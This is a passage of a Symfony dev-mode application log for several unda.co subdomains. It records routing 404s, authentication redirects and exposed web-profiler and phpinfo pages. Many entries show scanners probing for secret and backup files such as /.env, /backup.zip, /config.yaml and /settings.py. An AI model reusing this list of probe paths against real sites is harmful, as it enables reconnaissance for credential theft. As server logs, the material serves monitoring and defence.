  2560. [2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2561. [2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2562. [2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2563. [2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2564. [2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2565. [2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2566. [2025-12-17 18:30:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96?panel=time","method":"GET"} []
  2567. [2025-12-17 18:30:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2568. [2025-12-17 18:30:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  2569. [2025-12-17 18:30:53] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  2570. [2025-12-17 18:30:53] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2571. [2025-12-17 18:30:53] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2572. [2025-12-17 18:30:53] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2573. [2025-12-17 18:30:53] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2574. [2025-12-17 18:30:53] security.DEBUG: Calling Authentication entry point. [] []
  2575. [2025-12-17 18:30:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2576. [2025-12-17 18:30:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2577. [2025-12-17 18:30:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2578. [2025-12-17 18:30:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2579. [2025-12-17 18:30:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
  2580. [2025-12-17 18:30:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  2581. [2025-12-17 18:30:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2582. [2025-12-17 18:30:54] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2583. [2025-12-17 18:30:54] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2584. [2025-12-17 18:30:54] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2585. [2025-12-17 18:30:54] security.DEBUG: Calling Authentication entry point. [] []
  2586. [2025-12-17 18:34:20] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  2587. [2025-12-17 18:34:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2588. [2025-12-17 18:34:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2589. [2025-12-17 18:34:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2590. [2025-12-17 18:34:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2591. [2025-12-17 18:34:21] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
  2592. [2025-12-17 18:35:40] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  2593. [2025-12-17 18:35:40] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  2594. [2025-12-17 18:35:40] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2595. [2025-12-17 18:35:40] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2596. [2025-12-17 18:35:40] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2597. [2025-12-17 18:35:40] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2598. [2025-12-17 18:35:40] security.DEBUG: Calling Authentication entry point. [] []
  2599. [2025-12-17 18:35:40] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
  2600. [2025-12-17 18:35:40] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  2601. [2025-12-17 18:35:40] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2602. [2025-12-17 18:35:40] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2603. [2025-12-17 18:35:40] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2604. [2025-12-17 18:35:40] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2605. [2025-12-17 18:35:40] security.DEBUG: Calling Authentication entry point. [] []
  2606. [2025-12-17 18:35:41] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
  2607. [2025-12-17 18:35:41] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  2608. [2025-12-17 18:35:41] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2609. [2025-12-17 18:35:41] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2610. [2025-12-17 18:35:41] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2611. [2025-12-17 18:35:41] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2612. [2025-12-17 18:35:41] security.DEBUG: Calling Authentication entry point. [] []
  2613. [2025-12-17 18:37:06] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle&line=0","method":"GET"} []
  2614. [2025-12-17 18:43:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96?panel=security","method":"GET"} []
  2615. [2025-12-17 18:43:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2616. [2025-12-17 18:45:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?panel=twig","method":"GET"} []
  2617. [2025-12-17 18:45:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2618. [2025-12-17 18:53:12] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
  2619. [2025-12-17 18:55:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"04e5af","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/04e5af","method":"GET"} []
  2620. [2025-12-17 18:55:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  2621. [2025-12-17 18:55:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2?panel=twig","method":"GET"} []
  2622. [2025-12-17 18:55:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2623. [2025-12-17 18:57:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2624. [2025-12-17 18:57:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2625. [2025-12-17 18:57:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2626. [2025-12-17 18:57:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2627. [2025-12-17 18:57:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.example"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.example\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2628. [2025-12-17 18:57:19] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/app_dev.php/_profiler/phpinfo","method":"GET"} []
  2629. [2025-12-17 18:57:21] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?phpinfo=-1","method":"GET"} []
  2630. [2025-12-17 18:57:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2631. [2025-12-17 18:57:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.example"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.example\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2632. [2025-12-17 18:57:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2633. [2025-12-17 18:57:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.cfg"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.cfg\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2634. [2025-12-17 18:57:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /staging2/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /staging2/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2635. [2025-12-17 18:57:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /robomongo.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /robomongo.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2636. [2025-12-17 18:57:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2637. [2025-12-17 18:57:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00f518","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/00f518","method":"GET"} []
  2638. [2025-12-17 18:57:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  2639. [2025-12-17 18:57:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Admin/test"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Admin/test\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
